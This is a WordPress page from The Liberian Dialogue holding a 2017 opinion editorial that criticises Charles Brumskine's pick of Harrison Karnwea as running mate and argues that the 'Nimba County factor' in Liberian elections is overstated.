


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head profile="http://gmpg.org/xfn/11">

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta name="msvalidate.01" content="8EAB632258680E61B37E87498F97272A" />
<title>   Charles Brumskine and the Nimba (County) Factor  : The Liberian Dialogue</title>

<meta name="generator" content="WordPress 4.7.3" />

<link rel="stylesheet" href="http://theliberiandialogue.org/wp-content/themes/wp-launch/wp-launch/style.css" type="text/css" media="screen" />

<link rel="alternate" type="application/rss+xml" title="The Liberian Dialogue RSS Feed" href="http://theliberiandialogue.org/feed/" />

<link rel="pingback" href="http://theliberiandialogue.org/xmlrpc.php" />


<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="The Liberian Dialogue &raquo; Charles Brumskine and the Nimba (County) Factor Comments Feed" href="http://theliberiandialogue.org/2017/03/31/charles-brumskine-and-the-nimba-county-factor/feed/" />
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.2.1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.2.1\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/theliberiandialogue.org\/wp-includes\/js\/wp-emoji-release.min.js"}};
			!function(a,b,c){function d(a){var b,c,d,e,f=String.fromCharCode;if(!k||!k.fillText)return!1;switch(k.clearRect(0,0,j.width,j.height),k.textBaseline="top",k.font="600 32px Arial",a){case"flag":return k.fillText(f(55356,56826,55356,56819),0,0),!(j.toDataURL().length<3e3)&&(k.clearRect(0,0,j.width,j.height),k.fillText(f(55356,57331,65039,8205,55356,57096),0,0),b=j.toDataURL(),k.clearRect(0,0,j.width,j.height),k.fillText(f(55356,57331,55356,57096),0,0),c=j.toDataURL(),b!==c);case"emoji4":return k.fillText(f(55357,56425,55356,57341,8205,55357,56507),0,0),d=j.toDataURL(),k.clearRect(0,0,j.width,j.height),k.fillText(f(55357,56425,55356,57341,55357,56507),0,0),e=j.toDataURL(),d!==e}return!1}function e(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var f,g,h,i,j=b.createElement("canvas"),k=j.getContext&&j.getContext("2d");for(i=Array("flag","emoji4"),c.supports={everything:!0,everythingExceptFlag:!0},h=0;h<i.length;h++)c.supports[i[h]]=d(i[h]),c.supports.everything=c.supports.everything&&c.supports[i[h]],"flag"!==i[h]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[i[h]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(g=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",g,!1),a.addEventListener("load",g,!1)):(a.attachEvent("onload",g),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),f=c.source||{},f.concatemoji?e(f.concatemoji):f.wpemoji&&f.twemoji&&(e(f.twemoji),e(f.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
<link rel='stylesheet' id='fbComments_hideWpComments-css'  href='http://theliberiandialogue.org/wp-content/plugins/facebook-comments-for-wordpress/css/facebook-comments-hidewpcomments.css' type='text/css' media='all' />
<link rel='stylesheet' id='fbc_rc_widgets-style-css'  href='http://theliberiandialogue.org/wp-content/plugins/facebook-comments-for-wordpress/css/facebook-comments-widgets.css' type='text/css' media='all' />
<link rel='stylesheet' id='contact-form-7-css'  href='http://theliberiandialogue.org/wp-content/plugins/contact-form-7/includes/css/styles.css' type='text/css' media='all' />
<script type='text/javascript' src='http://theliberiandialogue.org/wp-includes/js/jquery/jquery.js'></script>
<script type='text/javascript' src='http://theliberiandialogue.org/wp-includes/js/jquery/jquery-migrate.min.js'></script>
<link rel='https://api.w.org/' href='http://theliberiandialogue.org/wp-json/' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://theliberiandialogue.org/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://theliberiandialogue.org/wp-includes/wlwmanifest.xml" /> 
<link rel='prev' title='Quincy B: RIP' href='http://theliberiandialogue.org/2017/03/24/quincy-b-rip/' />
<meta name="generator" content="WordPress 4.7.3" />
<link rel="canonical" href="http://theliberiandialogue.org/2017/03/31/charles-brumskine-and-the-nimba-county-factor/" />
<link rel='shortlink' href='http://theliberiandialogue.org/?p=4682' />
<link rel="alternate" type="application/json+oembed" href="http://theliberiandialogue.org/wp-json/oembed/1.0/embed?url=http%3A%2F%2Ftheliberiandialogue.org%2F2017%2F03%2F31%2Fcharles-brumskine-and-the-nimba-county-factor%2F" />
<link rel="alternate" type="text/xml+oembed" href="http://theliberiandialogue.org/wp-json/oembed/1.0/embed?url=http%3A%2F%2Ftheliberiandialogue.org%2F2017%2F03%2F31%2Fcharles-brumskine-and-the-nimba-county-factor%2F&#038;format=xml" />
<meta property='og:title' content='Charles Brumskine and the Nimba (County) Factor' /><meta property='og:site_name' content='The Liberian Dialogue' /><meta property='og:url' content='http://theliberiandialogue.org/2017/03/31/charles-brumskine-and-the-nimba-county-factor/' /><meta property='og:type' content='article' /><meta property='fb:app_id' content='112943715463903'>
		<script type="text/javascript">
            var _statcounter = _statcounter || [];
            _statcounter.push({"tags": {"author": "admin"}});
        </script>
	   <!-- <meta name="NextGEN" version="2.2.1" /> -->
<link href="http://theliberiandialogue.org/wp-content/themes/wp-launch/wp-launch/style.php" rel="stylesheet" type="text/css" />

<script type="text/javascript" src="http://theliberiandialogue.org/wp-content/themes/wp-launch/wp-launch/js/suckerfish.js"></script>
<script type="text/javascript" src="http://theliberiandialogue.org/wp-content/themes/wp-launch/wp-launch/js/external.js"></script>
<!--PNG Fix for IE6-->
<!--[if lte IE 6]>
<script type="text/javascript" src="http://theliberiandialogue.org/wp-content/themes/wp-launch/wp-launch/iepngfix/iepngfix_tilebg.js"></script>
<style>
#catnav, #catnav-bottom, #wrap, #wrap-top, #wrap-bottom, #footer-widgets, #footer-widgets-top, #footer-widgets-bottom, #head-content { behavior:url(http://theliberiandialogue.org/wp-content/themes/wp-launch/wp-launch/iepngfix/iepngfix.htc); }
</style>
<![endif]-->

</head>

<body>

<div id="topnav" class="clearfix">
	<div class="limit clearfix">
				<div class="menu-top-menu-container"><ul id="menu-top-menu" class="menu"><li id="menu-item-22" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-22"><a href="http://theliberiandialogue.org/">Home</a></li>
<li id="menu-item-11" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-11"><a href="http://theliberiandialogue.org/about-us/">About Us</a></li>
<li id="menu-item-15" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-15"><a href="http://theliberiandialogue.org/write-for-us/">Write For Us</a></li>
<li id="menu-item-21" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-21"><a href="http://theliberiandialogue.org/contact-us/">Contact Us</a>
<ul class="sub-menu">
	<li id="menu-item-1517" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-1517"><a href="http://theliberiandialogue.org/category/sports/">Sports</a></li>
	<li id="menu-item-332" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-332"><a href="http://theliberiandialogue.org/arts-and-entertainment/">Arts &#038; Entertainment</a></li>
	<li id="menu-item-479" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-479"><a href="http://theliberiandialogue.org/viewer-letters/">Viewer Letters</a></li>
</ul>
</li>
<li id="menu-item-3801" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-3801"><a href="http://theliberiandialogue.org/letter-to-the-editor/">Letter to the Editor</a></li>
</ul></div>		
		<div class="sub-icons">
			<a title="Subscribe via RSS Feed" href="http://theliberiandialogue.org/feed/"><img class="rss-sub" src="http://theliberiandialogue.org/wp-content/themes/wp-launch/wp-launch/images/rss3.png" alt="Subscribe via RSS Feed" align="top" /></a>
			<a id="twitter-sub" rel="external" title="Follow Us on Twitter" href="http://www.twitter.com/"><img class="twitter-sub" src="http://theliberiandialogue.org/wp-content/themes/wp-launch/wp-launch/images/twitter3.png" alt="Follow Us on Twitter" align="top" /></a>
			<a title="Connect with me on Facebook" rel="external" href="http://www.facebook.com/"><img class="facebook-sub" src="http://theliberiandialogue.org/wp-content/themes/wp-launch/wp-launch/images/facebook3.png" alt="Connect with me on Facebook" align="top" /></a>
			<a title="Connect with me on LinkedIn" rel="external" href="http://www.linkedin.com/"><img class="linkedin-sub" src="http://theliberiandialogue.org/wp-content/themes/wp-launch/wp-launch/images/linkedin3.png" alt="Connect with me on LinkedIn" align="top" /></a>
			<a title="Connect with me on Flickr" rel="external" href="http://www.flickr.com/people/"><img class="flickr-sub" src="http://theliberiandialogue.org/wp-content/themes/wp-launch/wp-launch/images/flickr3.png" alt="Connect with me on Flickr" align="top" /></a>
		</div>
	</div>
</div>

<div id="header" class="clearfix">

	<div id="head-content" class="clearfix" >
		<div id="sitetitle">
			<div class="title"><a href="http://theliberiandialogue.org">The Liberian Dialogue</a></div> 
			<div class="description">Serving you since 2002. Credible. Compelling. Consistant. Provocative.</div>
		</div>

		<div id="head-banner468">
			<a href='http://theliberiandialogue.org/letter-to-the-editor/'><img src='http://theliberiandialogue.org/wp-content/uploads/2015/07/ad2.jpg' alt='banner ad' /></a>		</div>
	</div>

</div>

<div id="catnav" class="clearfix">
		<div class="menu-main-menu-container"><ul id="menu-main-menu" class="menu"><li id="menu-item-116" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-116"><a href="http://theliberiandialogue.org/category/news-headlines/">News</a></li>
<li id="menu-item-1519" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-1519"><a href="http://theliberiandialogue.org/category/arts-entertainment/">Entertainment</a></li>
<li id="menu-item-1518" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-1518"><a href="http://theliberiandialogue.org/category/sports/">Sports</a></li>
<li id="menu-item-2059" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-2059"><a href="http://theliberiandialogue.org/category/viewers/">Viewer Articles</a></li>
<li id="menu-item-118" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-118"><a href="http://theliberiandialogue.org/category/press-releases/">Press Releases</a></li>
<li id="menu-item-117" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-117"><a href="http://theliberiandialogue.org/category/editorial/">Editorial</a></li>
<li id="menu-item-4553" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4553"><a href="http://theliberiandialogue.org/about-us/">About Us</a></li>
<li id="menu-item-4535" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-4535"><a href="http://theliberiandialogue.org/more/">More</a>
<ul class="sub-menu">
	<li id="menu-item-2428" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-2428"><a href="http://theliberiandialogue.org/category/qa/">Q&#038;A</a></li>
	<li id="menu-item-51" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-51"><a href="http://theliberiandialogue.org/photo-galleries/">Gallery</a></li>
	<li id="menu-item-120" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-120"><a href="http://theliberiandialogue.org/category/obituaries/">Obituaries</a></li>
	<li id="menu-item-2058" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-2058"><a href="http://theliberiandialogue.org/category/letters-to-the-editor/">Letters to the Editor</a>
	<ul class="sub-menu">
		<li id="menu-item-3802" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-3802"><a href="http://theliberiandialogue.org/letter-to-the-editor/">Letter to the Editor</a></li>
	</ul>
</li>
</ul>
</li>
</ul></div>	</div>
<div id="catnav-bottom"></div>

<div id="wrap" class="clearfix">
	<div id="page" class="clearfix">

		<div id="contentleft" class="maincontent">

			<div id="content">

				
<div class="banner468">
	<a href='http://theliberiandialogue.org/letter-to-the-editor/'><img src='http://theliberiandialogue.org/wp-content/uploads/2015/07/ad1.jpg' alt='banner ad' /></a></div>


				<div class="singlepost">

					<div class="post clearfix" id="post-main-4682">

						
						<div class="entry">

							<h1 class="post-title"><a href="http://theliberiandialogue.org/2017/03/31/charles-brumskine-and-the-nimba-county-factor/" rel="bookmark" title="Permanent Link to Charles Brumskine and the Nimba (County) Factor">Charles Brumskine and the Nimba (County) Factor</a></h1>

							

<div class="postinfo">
	<a href="http://theliberiandialogue.org/author/admin/" title="Posts by admin" rel="author">admin</a> | March 31, 2017 | <a href="http://theliberiandialogue.org/2017/03/31/charles-brumskine-and-the-nimba-county-factor/#respond">no comments</a>
</div>


							<p>By Tewroh-Wehtoe Sungbeh&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <img width="204" height="203" class="alignright size-full wp-image-4683" alt="" src="http://theliberiandialogue.org/wp-content/uploads/2017/03/Charles-Walker-Brumskine.png" srcset="http://theliberiandialogue.org/wp-content/uploads/2017/03/Charles-Walker-Brumskine.png 204w, http://theliberiandialogue.org/wp-content/uploads/2017/03/Charles-Walker-Brumskine-150x150.png 150w" sizes="(max-width: 204px) 100vw, 204px" /></p>
<p>&nbsp;</p>
<p>Charles Walker Brumskine is a lawyer and a Liberian politician.</p>
<p>I don’t even know whether Mr. Brumskine wants to be known as a politician first, a lawyer second, or verse visa.</p>
<p>What I know is that he’s known as one of Liberia’s best legal minds.</p>
<p>On the political front, however, Mr. Brumskine hasn’t shown the brilliance that some saw in him as a lawyer, which propelled him from an asterisk to a household name and on to the national political scene as a one-time serious presidential candidate.</p>
<p>From one opportunistic political miscalculation to another; Mr. Brumskine seems to be ‘trying his luck’ in a desperate attempt to win the Liberian presidency, by any means necessary. &nbsp;</p>
<p>Mr. Brumskine tried his luck in government once in the 2000s as a reliable legislative floor leader to the disgraced Charles Taylor, during the heyday of Mr. Taylor’s tyrannical rule as a “Senator representing” Grand Bassa County.</p>
<p>The most unconscionable part of Mr. Brumskine’s politics during that painful period is his selfishness and the insensitivity he showed the Liberian people when he sacrificed his soul (if there is any left in him), and everything he stands for as the shining public face representing tyranny, corruption, greed, deaths and destruction.</p>
<p>Brumskine’s self-centered politics has once again shown its face in his latest move when he chose as his running mate Harrison S. Kanwea, Sr., amid the 2017 ruling by the Supreme Court of Liberia, which upheld Article 56 (a) of the Code of Conduct law signed by President Sirleaf in 2014 and passed by the national legislature.</p>
<p>According to article 56 (a) “all officials appointed by the President of the Republic of Liberia are not to engage in political activities, canvass or contest for elected offices, use Government facilities, equipment or resources in support of partisan or political activities or serve on a campaign team of any political party or the campaign of an independent candidate for two years.”&nbsp;&nbsp;Article 56 (a) of the same code also states: “Any other official appointed by the President who holds a tenured position and desires to contest for public elective office shall resign said post three (3) years prior to the date of such public elections.”</p>
<p>Harrison S. Kanwea, Sr., formerly of the ruling Unity Party, and now a convenient member of Charles Brumskine’s Liberty Party, resigned his post in the Sirleaf administration as Manager Director of the Forestry Development Authority as recent as March 12, 2017, to be the running mate of Charles Walker Brumskine.</p>
<p>So, the Code of Conduct law does not apply to vice presidential candidates?</p>
<p>Well, the so-called “Nimba County Factor” perhaps is the apparent reasons behind Charles Brumskine’s about-face – or his pivot from heading in the right direction of abiding by the law of the land; to pandering to Nimba County, in a dishonest attempt to win the Liberian presidency at any cost.</p>
<p>Is there a Nimba County factor?</p>
<p>Are the citizens of Nimba County like herds kind of easy to get, and easy to be driven to the polls to vote for a candidate – any candidate who does not share their values and their politics?</p>
<p>Are they capable of voting for the best candidate who shares their values, their dreams and their aspirations, and not because the person is a Nimba County citizen?</p>
<p>Are the people of Nimba County monolithic in their politics?</p>
<p>I don’t want to believe the latter.</p>
<p>That’s because the numbers from recent elections in which a native-Nimbanian was&nbsp;in&nbsp;a race against another native-Nimbanian is as revealing as the analysis that comes out of the mouths and pens of Liberian political observers.</p>
<p>Running as an Independent candidate for the senate&nbsp;in October 18, 2005 in a three-way race between Adolphus Dolo and Evans Vaye Koah, perennial candidate Prince Johnson received 33.8% of the votes, way below the 50 percent threshold to avoid a runoff.</p>
<p>Also during the November 8, 2005 (national) presidential runoff elections, and in a three-way race, Charles Brumskine and his running mate, Amelia Ward received 13.9% of the votes; not even 50%.</p>
<p>The numbers are even huge when non-Nimbanians are in the race against Prince Johnson in a national election.</p>
<p>Ellen Johnson Sirleaf received 43.9% of the votes to Prince Johnson’s 11.6%, and Winston Tubman’s 11.6%, in the October 11, 2011 presidential elections.</p>
<p>All I am saying is Prince Johnson is not invincible in Nimba County. He surely can be defeated in Nimba County. Period!</p>
<p>&nbsp;The ticket of Charles Brumskine and Harrison Karnwea can also be defeated in Nimba County.</p>
<p>&nbsp;Both Charles Brumskine and Harrison Karnwea, Sr.,&nbsp;can be defeated in Nimba County if the opposing side can take a winning bread and butter message to the people, can project strength and an inspiring message that resonates hope, unity and inclusion in an age of hunger, poverty and human suffering, in the era of Ellen Johnson Sirleaf. &nbsp;</p>
<p>Like in all of Liberia, the people of Nimba County are not to be taken for granted politically, and shouldn’t fall for anybody because the person is from their part of town.</p>
<p>The Liberian people cannot afford to vote for bad, corrupt, insensitive, uncaring and unaccountable candidates and leaders.</p>
<p>We have a bunch around already.</p>

														<p class="cats"><strong>Category</strong>: <a href="http://theliberiandialogue.org/category/editorial/" rel="category tag">Editorial</a>, <a href="http://theliberiandialogue.org/category/news-headlines/" rel="category tag">News Headlines</a></p>

						</div>

						
<div class="auth-bio clearfix">
	<div class="bio">
		<img alt='' src='http://1.gravatar.com/avatar/17a2ffbc62673443af36a87179c16cfc?s=60&#038;d=mm&#038;r=g' srcset='http://1.gravatar.com/avatar/17a2ffbc62673443af36a87179c16cfc?s=120&amp;d=mm&amp;r=g 2x' class='avatar avatar-60 photo' height='60' width='60' />		<p><strong>About the Author</strong>: </p>
	</div>
</div>

						
<div id="related" class="clearfix">


	<div class="subscribe">

		<p class="intro">If you enjoyed this article, subscribe to receive more just like it.</p>

		<p class="feed"><a href="http://theliberiandialogue.org/feed/">Subscribe via RSS Feed</a></p>

		<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=http://feeds2.feedburner.com/', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
			<input type="hidden" value="http://feeds2.feedburner.com/" name="uri"/>
			<input type="hidden" name="loc" value="en_US"/>
			<p class="email-form">
				<input type="text" id="bot-sub" name="email" value="enter email address" onfocus="if (this.value == 'enter email address') {this.value = '';}" onblur="if (this.value == '') {this.value = 'enter email address';}" />
				<input type="image" src="http://theliberiandialogue.org/wp-content/themes/wp-launch/wp-launch/images/blank.gif" id="bot-subbutton" alt="submit" />
			</p>
			<div style="clear:both;"><small>Privacy guaranteed. We'll never share your info.</small></div>
		</form>


	</div>

</div>

					</div>

					
<!-- Facebook Comments for WordPress v3.1.3 by we8u (http://we8u.com/facebook-comments/) -->

<a name='facebook-comments'></a>

<div id='fb-root'></div>
<script src='http://connect.facebook.net/en_US/all.js#appId=112943715463903&amp;xfbml=1' type='text/javascript'></script>

<script type='text/javascript'>
	var addedComment = function(response) {
		//console.log('fbComments: Caught added comment');
		//console.log('fbComments:     Making AJAX call to update Facebook comment count');
		$.post('http://theliberiandialogue.org/wp-content/plugins/facebook-comments-for-wordpress/facebook-comments-ajax.php', { fn: 'addComment', xid: '_post4682' }, function(resp) {
			if (resp === 'true') {
				//console.log('fbComments:     Updated and cached Facebook comment count for post with xid=_post4682');
			} else {
				//console.log('fbComments:     FAILED to update Facebook comment count for post with xid=_post4682');
			}
		});

	};

	FB.Event.subscribe('comments.add', addedComment);
</script>

<div id='fbComments' style=''>
<!-- facebook comments v2 with imported v1 comments -->
<iframe src='https://www.facebook.com/plugins/like.php?href=http://theliberiandialogue.org/2017/03/31/charles-brumskine-and-the-nimba-county-factor/&amp;layout=standard&amp;show_faces=false&amp;width=450&amp;action=like&amp;font=arial&amp;colorscheme=light' scrolling='no' frameborder='0' style='height: 62px; width: 100%;' allowTransparency='true'></iframe>
	<fb:comments xid='_post4682' url='http://theliberiandialogue.org/2017/03/31/charles-brumskine-and-the-nimba-county-factor/'  numposts='0' width='530' publish_feed='true' migrated='1'></fb:comments></div>


<!-- You can start editing here. -->


			<!-- If comments are open, but there are no comments. -->

	 


<div id="respond">

<h3>Leave a Reply</h3>

<div class="cancel-comment-reply">
	<small><a rel="nofollow" id="cancel-comment-reply-link" href="/2017/03/31/charles-brumskine-and-the-nimba-county-factor/#respond" style="display:none;">Click here to cancel reply.</a></small>
</div>

<p>You must be <a href="http://theliberiandialogue.org/wp-login.php?redirect_to=http%3A%2F%2Ftheliberiandialogue.org%2F2017%2F03%2F31%2Fcharles-brumskine-and-the-nimba-county-factor%2F">logged in</a> to post a comment.</p>
</div>



				</div>

			</div>

		</div>


		<div id="contentright">

			<div id="sidebar" class="clearfix">
				<ul> 
<li id="subscribebox-widget-3" class="widget subscribebox"><h3 class="widgettitle">Subscribe to Us</h3><div class="intro"><p>Enter your email address below to receive updates each time we publish new articles. 
Phone contact: 770-896-5873..</p>

	
	<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=http://feeds2.feedburner.com/', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
		<input type="hidden" value="http://feeds2.feedburner.com/" name="uri"/>
		<input type="hidden" name="loc" value="en_US"/>
		<p class="email-form">
			<input type="text" id="sub" name="email" value="enter email address" onfocus="if (this.value == 'enter email address') {this.value = '';}" onblur="if (this.value == '') {this.value = 'enter email address';}" />
			<input type="image" src="http://theliberiandialogue.org/wp-content/themes/wp-launch/wp-launch/images/blank.gif" id="subbutton" alt="submit" />
		</p>
		<div style="clear:both;"><small>Privacy guaranteed. We'll never share your info.</small></div>
	</form>

	
</div></li>
<li id="text-7" class="widget widget_text"><h3 class="widgettitle">Liberian Democracy Ambushed: How Liberian Presidents And the Educated Elites Plunged Liberia into Dictatorship, Poverty, War and Underdevelopment &#8211; By Tewroh-Wehtoe Sungbeh</h3>			<div class="textwidget">2016/06 Liberian Democracy Ambushed: How Liberian Presidents And the Educated Elites Plunged Liberia into Dictatorship, Poverty, War and Underdevelopment<a href='http://theliberiandialogue.org/liberian-democracy-ambushed-my-new-book-get-a-copy/' ><img src='http://theliberiandialogue.org/wp-content/uploads/2016/08/sungbehbook.jpg' alt='banner ad' width="300px" /></a>  
***************************************************************************
Library of Congress Control Number:<br />
2016948006<br />
ISBN: 978-0-913491-41-6
************************************************************************
<p>My new book, Liberian Democracy Ambushed, is out. It is about us, our politicians, our progressives and our intellectuals. It is about how they held democracy hostage, ambushed it, destroyed our country, and how we helped them along the way.</p>
<form action="https://www.paypal.com/cgi-bin/webscr" method="post" target="_top">
<input type="hidden" name="cmd" value="_s-xclick">
<input type="hidden" name="hosted_button_id" value="XN4399L6AEXRE">
<input type="image" src="https://www.paypalobjects.com/en_US/i/btn/btn_buynowCC_LG.gif" border="0" name="submit" alt="PayPal - The safer, easier way to pay online!">
<img alt="" border="0" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="1" height="1">
</form>

<p>Get a copy...Get a copy @ 770-896-5873.</p>
</div>
		</li>
<!--API key hasn't been set for ICIT Weather Widget, contact site administrator to set it.--><li id="linkcat-2" class="widget widget_links"><h3 class="widgettitle">Blogroll</h3>
	<ul class='xoxo blogroll'>
<li><a href="http://africaenvironmentalwatch.org">Africa Environmental Watch</a></li>
<li><a href="http://uniboa.org">Bassa Association &#8211; USA</a></li>
<li><a href="http://dennisjah.blogspot.com">dennisjah.blogspot.com</a></li>
<li><a href="http://emansion.gov.lr/">Executive Mansion</a></li>
<li><a href="http://geeshopecaringagency.com">Gee&#039;s Hope Caring Agency, Inc</a></li>
<li><a href="http://geeshomecare.com">Gees Hope Caring Agency, LLC</a></li>
<li><a href="http://libwebradio.net/">Lib Web Radio</a></li>
<li><a href="http://ledinow.org">Liberia Economic Development Initiative (LEDI)</a></li>
<li><a href="http://libmyturn.com">LIBERIA MY TURN</a></li>
<li><a href="http://liberiapastandpresent.org">Liberia Past and Present</a></li>
<li><a href="http://www.lamaatlanta.org">Liberian Association of Metropolitan Atlanta (LAMA)</a></li>
<li><a href="http://liberianconsulatega.com">Liberian Consulate &#8211; Atlanta</a></li>
<li><a href="http://embassyofliberia.org">Liberian Embassy</a></li>
<li><a href="http://libstarsview.com" target="_blank">Liberian Stars View</a></li>
<li><a href="http://necliberia.org">National Elections Commission</a></li>
<li><a href="http://ulaaliberia.net">ULAA</a></li>
<li><a href="http://monrovia.usembassy.gov">US Embassy</a></li>

	</ul>
</li>

<li id="archives-2" class="widget widget_archive"><h3 class="widgettitle">Archives</h3>		<ul>
			<li><a href='http://theliberiandialogue.org/2017/03/'>March 2017</a>&nbsp;(8)</li>
	<li><a href='http://theliberiandialogue.org/2017/02/'>February 2017</a>&nbsp;(3)</li>
	<li><a href='http://theliberiandialogue.org/2017/01/'>January 2017</a>&nbsp;(5)</li>
	<li><a href='http://theliberiandialogue.org/2016/12/'>December 2016</a>&nbsp;(6)</li>
	<li><a href='http://theliberiandialogue.org/2016/11/'>November 2016</a>&nbsp;(4)</li>
	<li><a href='http://theliberiandialogue.org/2016/10/'>October 2016</a>&nbsp;(5)</li>
	<li><a href='http://theliberiandialogue.org/2016/09/'>September 2016</a>&nbsp;(1)</li>
	<li><a href='http://theliberiandialogue.org/2016/08/'>August 2016</a>&nbsp;(3)</li>
	<li><a href='http://theliberiandialogue.org/2016/07/'>July 2016</a>&nbsp;(3)</li>
	<li><a href='http://theliberiandialogue.org/2016/05/'>May 2016</a>&nbsp;(7)</li>
	<li><a href='http://theliberiandialogue.org/2016/04/'>April 2016</a>&nbsp;(8)</li>
	<li><a href='http://theliberiandialogue.org/2016/03/'>March 2016</a>&nbsp;(5)</li>
	<li><a href='http://theliberiandialogue.org/2016/02/'>February 2016</a>&nbsp;(5)</li>
	<li><a href='http://theliberiandialogue.org/2016/01/'>January 2016</a>&nbsp;(3)</li>
	<li><a href='http://theliberiandialogue.org/2015/12/'>December 2015</a>&nbsp;(7)</li>
	<li><a href='http://theliberiandialogue.org/2015/11/'>November 2015</a>&nbsp;(6)</li>
	<li><a href='http://theliberiandialogue.org/2015/10/'>October 2015</a>&nbsp;(9)</li>
	<li><a href='http://theliberiandialogue.org/2015/09/'>September 2015</a>&nbsp;(9)</li>
	<li><a href='http://theliberiandialogue.org/2015/08/'>August 2015</a>&nbsp;(7)</li>
	<li><a href='http://theliberiandialogue.org/2015/07/'>July 2015</a>&nbsp;(4)</li>
	<li><a href='http://theliberiandialogue.org/2015/06/'>June 2015</a>&nbsp;(11)</li>
	<li><a href='http://theliberiandialogue.org/2015/05/'>May 2015</a>&nbsp;(8)</li>
	<li><a href='http://theliberiandialogue.org/2015/04/'>April 2015</a>&nbsp;(6)</li>
	<li><a href='http://theliberiandialogue.org/2015/03/'>March 2015</a>&nbsp;(7)</li>
	<li><a href='http://theliberiandialogue.org/2015/02/'>February 2015</a>&nbsp;(11)</li>
	<li><a href='http://theliberiandialogue.org/2015/01/'>January 2015</a>&nbsp;(9)</li>
	<li><a href='http://theliberiandialogue.org/2014/12/'>December 2014</a>&nbsp;(18)</li>
	<li><a href='http://theliberiandialogue.org/2014/11/'>November 2014</a>&nbsp;(15)</li>
	<li><a href='http://theliberiandialogue.org/2014/10/'>October 2014</a>&nbsp;(17)</li>
	<li><a href='http://theliberiandialogue.org/2014/09/'>September 2014</a>&nbsp;(16)</li>
	<li><a href='http://theliberiandialogue.org/2014/08/'>August 2014</a>&nbsp;(14)</li>
	<li><a href='http://theliberiandialogue.org/2014/07/'>July 2014</a>&nbsp;(21)</li>
	<li><a href='http://theliberiandialogue.org/2014/06/'>June 2014</a>&nbsp;(15)</li>
	<li><a href='http://theliberiandialogue.org/2014/05/'>May 2014</a>&nbsp;(20)</li>
	<li><a href='http://theliberiandialogue.org/2014/04/'>April 2014</a>&nbsp;(14)</li>
	<li><a href='http://theliberiandialogue.org/2014/03/'>March 2014</a>&nbsp;(9)</li>
	<li><a href='http://theliberiandialogue.org/2014/02/'>February 2014</a>&nbsp;(5)</li>
	<li><a href='http://theliberiandialogue.org/2014/01/'>January 2014</a>&nbsp;(11)</li>
	<li><a href='http://theliberiandialogue.org/2013/12/'>December 2013</a>&nbsp;(15)</li>
	<li><a href='http://theliberiandialogue.org/2013/11/'>November 2013</a>&nbsp;(7)</li>
	<li><a href='http://theliberiandialogue.org/2013/10/'>October 2013</a>&nbsp;(11)</li>
	<li><a href='http://theliberiandialogue.org/2013/09/'>September 2013</a>&nbsp;(7)</li>
	<li><a href='http://theliberiandialogue.org/2013/08/'>August 2013</a>&nbsp;(5)</li>
	<li><a href='http://theliberiandialogue.org/2013/07/'>July 2013</a>&nbsp;(10)</li>
	<li><a href='http://theliberiandialogue.org/2013/06/'>June 2013</a>&nbsp;(11)</li>
	<li><a href='http://theliberiandialogue.org/2013/05/'>May 2013</a>&nbsp;(10)</li>
	<li><a href='http://theliberiandialogue.org/2013/04/'>April 2013</a>&nbsp;(10)</li>
